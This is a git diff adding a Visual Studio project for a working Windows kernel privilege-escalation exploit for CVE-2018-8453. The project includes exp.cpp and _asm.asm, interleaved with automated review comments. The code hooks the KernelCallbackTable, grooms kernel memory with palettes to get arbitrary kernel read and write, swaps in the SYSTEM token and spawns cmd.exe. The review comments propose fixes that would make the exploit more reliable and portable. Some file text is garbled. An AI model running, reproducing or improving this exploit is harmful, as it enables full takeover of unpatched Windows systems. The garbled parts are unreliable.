+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+exp.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+exp.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 exp.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
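Review bot: this is the unmodified Visual Studio wizard stub (it describes exp.vcxproj, exp.vcxproj.filters, exp.cpp and StdAfx.* and says nothing about the exploit); either delete it or replace it with what a user of this variant needs: which Windows build the hard-coded offsets and syscall numbers in exp.cpp and _asm.asm were taken from, that it is x64-only, and how it differs from the exp_x64_palette_length variant in the sibling directory.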
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/_asm.asm b/CVE-2018-8453/exp_x64_palette_paddress/exp/_asm.asm
new file mode 100644
index 0000000..e3a8637
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/_asm.asm
@@ -0,0 +1,36 @@
+public GetKernelCallbackTableBase
+public FuncInt3
+public SetWindowFNID
+_TEXT SEGMENT
+
+GetKernelCallbackTableBase PROC
+ ;int 3
+ mov rax,gs:[60h]
+ lea rax,[rax+58h]
+ mov rax,[rax]
+ ret
+GetKernelCallbackTableBase ENDP
+
+FuncInt3 PROC
+ int 3
+ ret
+FuncInt3 ENDP
+
+SetWindowFNID PROC
+ mov r10,rcx;
+ mov r11,rdx;
+ mov eax,1095h;
+ syscall;
+ ret;
+SetWindowFNID ENDP
+
+SetLinkedUFIs PROC
+ mov r10,rcx;
+ mov eax,12EAh;
+ syscall;
+ ret;
+SetLinkedUFIs ENDP
+
+END
+
+
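Review bot: the two win32k system-call numbers are hard-coded (`mov eax,1095h` in SetWindowFNID and `mov eax,12EAh` in SetLinkedUFIs) with no comment saying which Windows build they belong to; win32k syscall numbers change between builds, so on any other build these stubs invoke a different kernel function with the caller's arguments. Record the target build next to each constant, or derive the numbers at run time from the win32u.dll stubs on builds that export them, and have exp.cpp refuse to run elsewhere. Two style points: `SetLinkedUFIs` is the only procedure not listed under `public` at the top (MASM PROCs are public by default, so it links, but keep the list consistent), and `_TEXT SEGMENT` is never closed with `_TEXT ENDS` before `END`. The trailing `;` on each instruction line is an empty comment and can go.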
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.cpp b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.cpp
new file mode 100644
index 0000000..1890bd8
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.cpp
@@ -0,0 +1,416 @@
+#include "stdafx.h"
+#include
+#include
+#include
+#include
+#pragma comment(lib, "Psapi.lib")
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+HWND hReuseWND;
+
+HPALETTE hManager;
+HPALETTE hWorker;
+ULONG64 MgrAddr, WrkAddr;
+ULONG64 CurrentTagCLSAddr;
+
+CHAR SBTrackBUF[0x80];
+TCHAR MenuName[0xff0];
+HDC hDC_Writer[3000];
+ACCEL acckey[0x0D] = { 0 };
+HACCEL hAccels[1000];
+HACCEL hAccel;
+
+typedef void*(NTAPI *lHMValidateHandle)(HWND h, int type);
+lHMValidateHandle pHmValidateHandle = NULL;
+
+typedef unsigned __int64 QWORD, *PQWORD;
+typedef QWORD DT;
+
+typedef struct _HEAD
+{
+ HANDLE h;
+ DWORD cLockObj;
+} HEAD, *PHEAD;
+
+typedef struct _THROBJHEAD
+{
+ HEAD h;
+ PVOID pti;
+} THROBJHEAD, *PTHROBJHEAD;
+
+typedef struct _THRDESKHEAD
+{
+ THROBJHEAD h;
+ PULONG64 rpdesk;
+ ULONG64 pSelf; // points to the kernel mode address
+} THRDESKHEAD, *PTHRDESKHEAD;
+
+typedef struct
+{
+ QWORD UniqueProcessIdOffset;
+ QWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0x2e0, 0x358 };
+
+EXTERN_C PULONG64 GetKernelCallbackTableBase();
+EXTERN_C VOID FuncInt3();
+EXTERN_C VOID SetWindowFNID(HWND hWnd, LONG64 FNID);
+EXTERN_C VOID SetLinkedUFIs(HDC hDC,PULONG64 addr, LONG64 length);
+
+typedef ULONG64(WINAPI *fct_fnDispatch64)(PULONG64);
+fct_fnDispatch64 fnDWORD, fnClientFreeWindowClassExtraBytes;
+
+BOOL FindHMValidateHandle() {
+ HMODULE hUser32 = LoadLibraryA("user32.dll");
+ if (hUser32 == NULL) {
+ printf("Failed to load user32");
+ return FALSE;
+ }
+
+ BYTE* pIsMenu = (BYTE *)GetProcAddress(hUser32, "IsMenu");
+ if (pIsMenu == NULL) {
+ printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
+ return FALSE;
+ }
+ unsigned int uiHMValidateHandleOffset = 0;
+ for (unsigned int i = 0; i < 0x1000; i++) {
+ BYTE* test = pIsMenu + i;
+ if (*test == 0xE8) {
+ uiHMValidateHandleOffset = i + 1;
+ break;
+ }
+ }
+ if (uiHMValidateHandleOffset == 0) {
+ printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
+ return FALSE;
+ }
+
+ unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset);
+ unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
+ pHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11);
+
+ return TRUE;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+ int pal_cnt = (size - 0x90) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+ULONG64 alloccate_free_window()
+{
+ HMODULE hInst = GetModuleHandleA(0);
+ TCHAR strclassname[32] = { 0x41 };
+ WNDCLASSEX wnd = { 0x0 };
+ wnd.cbSize = sizeof(wnd);
+ wnd.lpszClassName = strclassname;
+ wnd.lpfnWndProc = DefWindowProc;
+ wnd.hInstance = hInst;
+ wnd.lpszMenuName = MenuName;
+ RegisterClassExW(&wnd);
+
+ HWND hTmpWnd = CreateWindowEx(
+ 0,
+ wnd.lpszClassName,
+ TEXT("WORDS"),
+ 0xcf0000,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ NULL, NULL, hInst, NULL);
+ PTHRDESKHEAD tagWND = (PTHRDESKHEAD)pHmValidateHandle(hTmpWnd, 1);
+ ULONG64 p = (ULONG64)tagWND;
+ ULONG64 kernellpSelp = tagWND->pSelf;
+ ULONG64 ulClientDelta = kernellpSelp - p;
+ ULONG64 kernelTagCLS = *(ULONG64*)(p + 0xa8);
+ ULONG64 userTagCLS = kernelTagCLS - ulClientDelta;
+ ULONG64 tagCLS_lpszMenuName = (ULONG64)(*((ULONG64*)(userTagCLS + 0x98)));
+ DestroyWindow(hTmpWnd);
+ UnregisterClass(strclassname, hInst);
+ return tagCLS_lpszMenuName;
+}
+
+ULONG64 GetMangerPalette()
+{
+ ULONG64 Previous, Current;
+ Previous = alloccate_free_window();
+ while (TRUE)
+ {
+ Current = alloccate_free_window();
+ if ((Current == Previous) && (Current != 0))
+ {
+ hManager = CreatePaletteOfSize(0xfe8,0x88);
+ return Current;
+ }
+ Previous = Current;
+ }
+}
+
+ULONG64 GetWorkerPalette()
+{
+ ULONG64 Previous, Current;
+ Previous = alloccate_free_window();
+ while (TRUE)
+ {
+ Current = alloccate_free_window();
+ if (Current == Previous && Current != 0)
+ {
+ hWorker = CreatePaletteOfSize(0xfe8, 0x88);
+ return Current;
+ }
+ Previous = Current;
+ }
+}
+
+VOID GetMangerAndWorker()
+{
+ MgrAddr = GetMangerPalette();
+ WrkAddr = GetWorkerPalette();
+ printf("[*] Manager: 0x%p\n[*] Worker: 0x%p\n", MgrAddr, WrkAddr);
+ memset(SBTrackBUF, 0x44, 0x80);
+ *(PULONG64)(SBTrackBUF + sizeof(ULONG64)) = 0;
+ *(PULONG64)(SBTrackBUF + sizeof(ULONG64) + sizeof(ULONG64)) = MgrAddr + 0x79 - 8 ;
+ //*(PULONG64)(SBTrackBUF + sizeof(ULONG64)) = MgrAddr + 0x16;
+ //*(PULONG64)(SBTrackBUF + sizeof(ULONG64) + sizeof(ULONG64)) = MgrAddr + 0x16;
+}
+
+VOID ReadMem(ULONG64 Addr, DWORD len,PULONG64 ret) {
+ ULONG64 tmp = Addr;
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&tmp);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)ret);
+}
+
+ULONG64 GetNTOsBase()
+{
+ ULONG64 Bases[0x1000];
+ DWORD needed = 0;
+ ULONG64 krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+ULONG64 PsInitialSystemProcess()
+{
+ ULONG64 Module = (ULONG64)LoadLibraryA("ntoskrnl.exe");
+ ULONG64 Addr = (ULONG64)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG64 res = 0;
+ ULONG64 ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 2 ,&res);
+ }
+ return res;
+}
+
+ULONG64 PsGetCurrentProcess(QWORD sysEPS)
+{
+ ULONG64 pEPROCESS = sysEPS;
+ ULONG64 Flink = 0;
+ ULONG64 PID = 0;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), 2, &Flink);
+ while (TRUE) {
+ pEPROCESS = Flink - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 2,&PID);
+ if (GetCurrentProcessId() == PID) {
+ return pEPROCESS;
+ }
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), 2, &Flink);
+ }
+}
+
+ULONG64 AllocSBTrackMem() {
+
+ TCHAR strMenuName[98];
+ memset(strMenuName, 0x55, 98);
+
+ TCHAR strclassname[0x32] = { 0x11 };
+ HMODULE hInst = GetModuleHandleA(0);
+ WNDCLASSEX wnd = { 0x0 };
+ wnd.cbSize = sizeof(wnd);
+ wnd.lpszClassName = strclassname;
+ wnd.lpfnWndProc = DefWindowProc;
+ wnd.hInstance = hInst;
+ wnd.lpszMenuName = strMenuName;
+ RegisterClassExW(&wnd);
+
+ hReuseWND = CreateWindowEx(
+ 0,
+ wnd.lpszClassName,
+ TEXT("WORDS"),
+ 0xcf0000,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ CW_USEDEFAULT,
+ NULL, NULL, hInst, NULL);
+ PTHRDESKHEAD tagWND = (PTHRDESKHEAD)pHmValidateHandle(hReuseWND, 1);
+ ULONG64 p = (ULONG64)tagWND;
+ ULONG64 kernellpSelp = tagWND->pSelf;
+ ULONG64 ulClientDelta = kernellpSelp - p;
+ ULONG64 kernelTagCLS = *(ULONG64*)(p + 0xa8);
+ CurrentTagCLSAddr = kernelTagCLS;
+ ULONG64 userTagCLS = kernelTagCLS - ulClientDelta;
+ ULONG64 tagCLS_lpszMenuName = (ULONG64)(*((ULONG64*)(userTagCLS + 0x98)));
+ printf("[*] MenuName: 0x%p\n", tagCLS_lpszMenuName);
+ return tagCLS_lpszMenuName;
+}
+
+VOID SetupManger()
+{
+ QWORD buf[20];
+ ZeroMemory(buf, 20 * sizeof(QWORD));
+ GetPaletteEntries(hManager, 30, 40, (LPPALETTEENTRY)buf);
+ buf[15] = WrkAddr + 0x78;
+ SetPaletteEntries(hManager, 30, 40, (LPPALETTEENTRY)buf);
+}
+
+void GetSystem()
+{
+ ULONG64 SelfToken = 0;
+ ULONG64 SystemToken = 0;
+ ULONG64 SystemEPS;
+ ULONG64 CurrentEPS;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 2, &SystemToken);
+ ReadMem(CurrentEPS + gConfig.TokenOffset, 2, &SelfToken);
+
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)(CurrentEPS + gConfig.TokenOffset));
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ printf("[*] Swaping shell.\n\n");
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+ Sleep(500);
+
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SelfToken);
+
+}
+
+void fnDWORDCallBack(PULONG64 msg)
+{
+ if (bMSGSENT && *msg) {
+ bMSGSENT = FALSE;
+ DestroyWindow(hMainWND);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((PULONG64)(*msg)) == (ULONG64)hMainWND)) {
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ DestroyAcceleratorTable(hAccel);
+ for (int i = 1001; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], (PULONG64)SBTrackBUF, 0xD);
+ }
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PULONG64 msg)
+{
+ if (*(PULONG64)*((PULONG64)*(msg - 11)) == (ULONG64)hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ printf("[*] Set Window FNID.\n");
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int main()
+{
+ printf("////////////////////////////////////////////////////////\n");
+ printf("// //\n");
+ printf("// CVE-2018-8453 EXPLOIT //\n");
+ printf("// Date : 2019/1/15 //\n");
+ printf("// Author: ze0r //\n");
+ printf("////////////////////////////////////////////////////////\n\n");
+
+ DWORD OldProtect = 0;
+ PULONG64 CallbackTb = GetKernelCallbackTableBase();
+
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch64)*CallbackTb;
+ *CallbackTb = (ULONG64)fnDWORDCallBack;
+
+ CallbackTb += 124;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch64)*CallbackTb;
+ *CallbackTb = (ULONG64)fnClientFreeWindowClassExtraBytesCallBack;
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+
+ FindHMValidateHandle();
+ memset(MenuName, 0x41, 0xfe0);
+ MenuName[0xfe0] = 0;
+
+ WNDCLASSEXW wndClass = { 0 };
+ wndClass = { 0 };
+ wndClass.cbSize = sizeof(WNDCLASSEXW);
+ wndClass.lpfnWndProc = DefWindowProc;
+ wndClass.cbClsExtra = 0;
+ wndClass.cbWndExtra = 1;
+ wndClass.hInstance = GetModuleHandleA(NULL);
+ wndClass.lpszMenuName = NULL;
+ wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+ RegisterClassExW(&wndClass);
+ printf("[*] CreateWindow.\n");
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+
+ printf("[*] Deploy Memory.\n");
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+ hAccel = CreateAcceleratorTableA(acckey, 12);
+ GetMangerAndWorker();
+ printf("[*] SendMessage.\n");
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ ULONG64 pHDCLinkData = AllocSBTrackMem();
+
+ SetupManger();
+ GetSystem();
+
+ QWORD buf[14];
+ ULONG64 zero = 0;
+ ZeroMemory(buf, 14 * sizeof(ULONG64));
+ ReadMem(pHDCLinkData, 28, buf);
+ if (buf[12] == 0x4444444400005555) {
+ CurrentTagCLSAddr += 0x98;
+ SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&CurrentTagCLSAddr);
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&zero);
+
+ DestroyWindow(hReuseWND);
+ for (int i = 0; i < 3000; i++) {
+ DeleteObject(hDC_Writer);
+ }
+ }
+ else {
+ Sleep(3600 * 1000);
+ }
+
+ return TRUE;
+}
+
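Review bot: in GetSystem the token-overwrite step passes the kernel address itself as the palette buffer: `SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)(CurrentEPS + gConfig.TokenOffset));`. Every other write to the manager goes through a local (`ULONG64 tmp = Addr; SetPaletteEntries(hManager, 0, 2, (LPPALETTEENTRY)&tmp);` in ReadMem), and a kernel pointer is not a valid user buffer, so this call cannot copy anything; the following `SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)&SystemToken)` only lands on the right field because the `ReadMem(CurrentEPS + gConfig.TokenOffset, 2, &SelfToken)` just above already pointed the worker there. Use a local as ReadMem does. Further points, in file order: the empty `#include` lines at the top should name the headers the code needs (windows.h, stdio.h, Psapi.h). FindHMValidateHandle truncates 64-bit pointers to `unsigned int` (`(unsigned int)pIsMenu - (unsigned int)hUser32`; exp.log flags this as C4311/C4302); use ULONG_PTR for the module-relative offset and a signed `int` for the rel32 displacement. The build-specific constants (`gConfig = { 0x2e0, 0x358 }`, KernelCallbackTable slots 2 and 126, `p + 0xa8`, `userTagCLS + 0x98`, `WrkAddr + 0x78`) carry no note of the build they were taken from; check the OS build at the start of main and exit rather than dereference wrong offsets on other builds. The restore `VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect)` runs after `CallbackTb` has been advanced by 126 entries, so it need not cover the range that was unprotected; keep the original pointer for the restore. PsGetCurrentProcess loops forever if the PID is never found; stop when Flink returns to the starting entry. The cleanup loop calls `DeleteObject(hDC_Writer)` with the whole array on every iteration, so none of the 3000 DCs is released; it should be `DeleteDC(hDC_Writer[i])`. `SWP_HIDEWINDOW | SB_HORZ` in fnClientFreeWindowClassExtraBytesCallBack are SetWindowPos and scroll-bar-selector constants, not window styles (hSBWND correctly uses SBS_HORZ); `printf("%p", ULONG64)` should be `%llx`; and the failure branch `Sleep(3600 * 1000)` should report that the `buf[12]` marker check failed instead of hanging silently.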
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj
new file mode 100644
index 0000000..a14a258
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj
@@ -0,0 +1,169 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {34B233E1-7209-49FD-8DB8-69A9C75906D6}
+ Win32Proj
+ exp
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
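Review bot: the project keeps Debug|Win32 and Release|Win32 configurations although the code is x64-only (`gs:[60h]`, `syscall` and 64-bit registers in _asm.asm, ULONG64 pointer arithmetic in exp.cpp), so a Win32 build either fails to assemble or yields a binary that cannot work; remove the Win32 configurations or make them fail with a clear message. Only Release|x64 sets `MultiThreaded` (static CRT); apply it to Debug|x64 as well or note why the two differ. The element names are also missing from the hunk as shown here, so the file cannot be reviewed beyond its values.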
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj.filters b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj.filters
new file mode 100644
index 0000000..48effbf
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/exp.vcxproj.filters
@@ -0,0 +1,41 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.cpp b/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.cpp
new file mode 100644
index 0000000..f026e66
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// exp.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.h b/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.h
new file mode 100644
index 0000000..baa4bbc
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+
+
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
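Review bot: the comments in this file (and in stdafx.cpp and targetver.h) are stored in a legacy code page and come out as mojibake when the repository is read as UTF-8; save the three files as UTF-8 with BOM, or replace the wizard comments with English. The two `#include` lines carry no header names as shown; stdafx.h should pull in windows.h and stdio.h here (and Psapi.h, which exp.cpp links against with `#pragma comment(lib, "Psapi.lib")`) so that exp.cpp's includes are not empty.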
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/targetver.h b/CVE-2018-8453/exp_x64_palette_paddress/exp/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/_asm.obj b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/_asm.obj
new file mode 100644
index 0000000..1a5acce
Binary files /dev/null and b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/_asm.obj differ
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.Build.CppClean.log b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.Build.CppClean.log
new file mode 100644
index 0000000..4d5e93e
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.Build.CppClean.log
@@ -0,0 +1,25 @@
+c:\users\ze0r\desktop\exp\exp\x64\release\exp.pch
+c:\users\ze0r\desktop\exp\exp\x64\release\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\x64\release\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\x64\release\exp.obj
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.pch
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\vc140.pdb
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\stdafx.obj
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.obj
+c:\users\ze0r\desktop\exp\exp\x64\release\_asm.obj
+c:\users\ze0r\desktop\exp\x64\release\exp.exe
+c:\users\ze0r\desktop\exp\x64\release\exp.ipdb
+c:\users\ze0r\desktop\exp\x64\release\exp.iobj
+c:\users\ze0r\desktop\exp\x64\release\exp.pdb
+c:\users\ze0r\desktop\exp_x64_palette_paddress\x64\release\exp.exe
+c:\users\ze0r\desktop\exp_x64_palette_paddress\x64\release\exp.ipdb
+c:\users\ze0r\desktop\exp_x64_palette_paddress\x64\release\exp.iobj
+c:\users\ze0r\desktop\exp_x64_palette_paddress\x64\release\exp.pdb
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\_asm.obj
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\exp.write.1u.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp_x64_palette_paddress\exp\x64\release\exp.tlog\link.write.1.tlog
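Review bot: this is build output and should not be committed; it also embeds the author's local paths (`c:\users\ze0r\desktop\exp\...` and `...\exp_x64_palette_paddress\...`, showing the tree was built from two locations). Add a .gitignore covering `x64/`, `Debug/`, `Release/`, `ipch/`, `.vs/`, `*.VC.db`, `*.suo`, `*.tlog`, `*.obj`, `*.pch`, `*.pdb`, `*.ipdb`, `*.iobj` and `*.log`, and drop the generated files already added in this patch.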
diff --git a/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.log b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.log
new file mode 100644
index 0000000..a5c4ffc
--- /dev/null
+++ b/CVE-2018-8453/exp_x64_palette_paddress/exp/x64/Release/exp.log
@@ -0,0 +1,15 @@
+ Assembling _asm.asm...
+ stdafx.cpp
+ exp.cpp
+exp.cpp(93): warning C4311: “类型转换”: 从“BYTE *”到“unsigned int”的指针截断
+exp.cpp(93): warning C4302: “类型转换”: 从“BYTE *”到“unsigned int”截断
+exp.cpp(93): warning C4311: “类型转换”: 从“HMODULE”到“unsigned int”的指针截断
+exp.cpp(93): warning C4302: “类型转换”: 从“HMODULE”到“unsigned int”截断
+exp.cpp(179): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 1 拥有了类型“ULONG64”
+exp.cpp(179): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 2 拥有了类型“ULONG64”
+exp.cpp(266): warning C4477: “printf”: 格式字符串“%p”需要类型“void *”的参数,但可变参数 1 拥有了类型“ULONG64”
+ 正在生成代码
+ All 20 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ 已完成代码的生成
